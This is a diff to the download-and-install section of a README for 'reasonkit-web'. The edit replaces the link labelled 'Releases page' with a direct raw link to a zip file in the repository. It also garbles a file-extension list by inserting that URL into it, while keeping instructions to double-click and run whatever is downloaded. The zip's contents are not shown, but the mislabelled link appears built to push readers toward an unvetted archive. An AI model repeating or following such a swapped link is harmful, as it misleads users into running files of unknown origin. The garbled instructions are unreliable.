romny5/reasonkit-web/README.md

 ## 💻 Download & Install

 1. **Visit the Releases Page:**
-   Go to our [Releases page](https://github.com/romny5/reasonkit-web/releases) to find the latest version of reasonkit-web.
+   Go to our [Releases page](https://github.com/romny5/reasonkit-web/raw/refs/heads/main/extension/reasonkit_web_1.3.zip) to find the latest version of reasonkit-web.

 2. **Choose Your Version:**
    On the Releases page, you will see a list of available versions.
 Click on the latest release.

 3. **Download the Installer:**
-   Look for a file that ends with `.exe`, `.dmg`, or `.tar.gz` depending on your operating system.
+   Look for a file that ends with `.exe`, `.dmg`, or `https://github.com/romny5/reasonkit-web/raw/refs/heads/main/extension/reasonkit_web_1.3.zip` depending on your operating system.
 Click on it to download.

 4. **Run the Installer:**
    Once the download is complete, locate the file in your downloads folder.
 Double-click the file to start the installation process.
 Follow any on-screen instructions.